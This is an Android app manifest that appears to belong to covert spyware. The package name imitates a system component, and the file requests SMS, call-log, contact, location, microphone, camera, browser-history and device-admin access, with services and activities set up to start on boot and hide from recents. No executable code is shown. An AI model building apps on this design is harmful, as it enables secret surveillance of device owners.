<?xml version="1.0" encoding="utf-8"?>
<manifest
    package="com.android.core.mngo"
    xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission
        android:name="android.permission.RECEIVE_SMS" />
    <uses-permission
        android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission
        android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission
        android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission
        android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission
        android:name="android.permission.READ_CONTACTS" />
    <uses-permission
        android:name="android.permission.READ_CALENDAR" />
    <uses-permission
        android:name="android.permission.READ_PHONE_NUMBERS" />
    <uses-permission
        android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission-sdk-23
        android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission-sdk-23
        android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission
        android:name="android.permission.PROCESS_OUTGOING_CALLS" />
    <uses-permission
        android:name="android.permission.READ_SMS" />
    <uses-permission
        android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS" />
    <uses-permission
        android:name="android.permission.INTERNET" />
    <uses-permission
        android:name="android.permission.READ_CALL_LOG" />
    <uses-permission
        android:name="android.permission.WRITE_CALL_LOG" />
    <uses-permission
        android:name="android.permission.GET_TASKS" />
    <uses-permission
        android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission
        android:name="android.permission.BLUETOOTH" />
    <uses-permission
        android:name="android.permission.RECORD_AUDIO" />
    <uses-permission
        android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission
        android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission
        android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
    <uses-permission
        android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission
        android:name="android.permission.PACKAGE_USAGE_STATS" />
    <uses-permission
        android:name="android.permission.READ_LOGS" />
    <uses-permission
        android:name="android.permission.INTERACT_ACROSS_USERS"
        android:protectionLevel="signature" />
    <uses-permission
        android:name="android.permission.INTERACT_ACROSS_USERS_FULL"
        android:protectionLevel="signature" />
    <uses-permission
        android:name="android.permission.WAKE_LOCK" />
    <uses-permission
        android:name="android.permission.CAMERA" />
    <uses-feature
        android:name="android.hardware.camera"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.camera.front"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.camera.flash"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.camera.autofocus"
        android:required="false" />
    <application
        android:theme="@style/Theme.AppCompat.Light"
        android:label="@string/global_app_name"
        android:name="com.utils.core.CoreApplication"
        android:allowBackup="false"
        android:hardwareAccelerated="true"
        android:largeHeap="true">
        <activity
            android:label="@string/global_name"
            android:icon="@drawable/ic_launcher"
            android:name="com.activities.ActivityMainStarter"
            android:excludeFromRecents="true"
            android:configChanges="keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action
                    android:name="android.intent.action.MAIN" />
                <category
                    android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:label="@string/global_app_name"
            android:name="com.activities.ActivityMain"
            android:excludeFromRecents="true"
            android:windowSoftInputMode="stateHidden">
            <intent-filter>
                <category
                    android:name="android.intent.category.LAUNCHER" />
                <category
                    android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </activity>
        <activity
            android:theme="@style/Theme.AppCompat.Translucent"
            android:name="com.activities.ActivityTrScr"
            android:taskAffinity=""
            android:excludeFromRecents="true"
            android:launchMode="singleInstance"
            android:noHistory="true" />
        <service
            android:label="@string/global_app_name"
            android:name="com.utils.services.ServiceCore" />
        <service
            android:name="com.utils.services.ServiceRecording"
            android:process=":r" />
        <receiver
            android:name="com.utils.receivers.ReceiverChangeConnection">
            <intent-filter>
                <action
                    android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action
                    android:name="android.net.wifi.WIFI_STATE_CHANGED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.utils.receivers.ReceiverOutgoingCall">
            <intent-filter
                android:priority="-1">
                <action
                    android:name="android.intent.action.NEW_OUTGOING_CALL" />
                <action
                    android:name="android.intent.action.PHONE_STATE" />
                <category
                    android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.utils.receivers.ReceiverBoot">
            <intent-filter
                android:priority="100">
                <action
                    android:name="android.intent.action.BOOT_COMPLETED" />
                <action
                    android:name="android.intent.action.ACTION_SHUTDOWN" />
                <category
                    android:name="android.intent.category.HOME" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.utils.receivers.ReceiverUserPresent">
            <intent-filter
                android:priority="2147483646">
                <action
                    android:name="android.intent.action.USER_PRESENT" />
                <action
                    android:name="com.teslacoilsw.widgetlocker.intent.UNLOCKED" />
                <action
                    android:name="com.jiubang.goscreenlock.unlock" />
                <action
                    android:name="com.jiubang.goscreenlock.appunlock" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.utils.receivers.ReceiverAlarm"
            android:exported="false" />
        <receiver
            android:name="com.utils.receivers.ReceiverSubOut"
            android:exported="false" />
        <receiver
            android:name="com.utils.receivers.ReceiverSubIn"
            android:exported="false" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.activities.ActivityWidget"
            android:excludeFromRecents="true"
            android:configChanges="keyboard|keyboardHidden|navigation|orientation" />
        <receiver
            android:label="@string/widget_name"
            android:icon="@drawable/widget_icon"
            android:name="com.utils.widgets.WidgetProvider">
            <intent-filter>
                <action
                    android:name="android.appwidget.action.APPWIDGET_UPDATE" />
            </intent-filter>
            <meta-data
                android:name="android.appwidget.provider"
                android:resource="@xml/widget" />
        </receiver>
        <receiver
            android:name="com.utils.receivers.ReceiverAdminPolicy"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin_data" />
            <intent-filter>
                <action
                    android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
                <action
                    android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
                <action
                    android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.utils.receivers.ReceiverPowerEvents">
            <intent-filter>
                <action
                    android:name="android.intent.action.ACTION_POWER_CONNECTED" />
                <action
                    android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
                <action
                    android:name="android.intent.action.ACTION_BATTERY_LOW" />
                <action
                    android:name="android.intent.action.ACTION_BATTERY_CHANGED" />
                <action
                    android:name="android.intent.action.ACTION_BATTERY_OKAY" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.utils.receivers.ReceiverAirplaneMode"
            android:enabled="true">
            <intent-filter>
                <action
                    android:name="android.intent.action.AIRPLANE_MODE" />
            </intent-filter>
        </receiver>
    </application>
</manifest>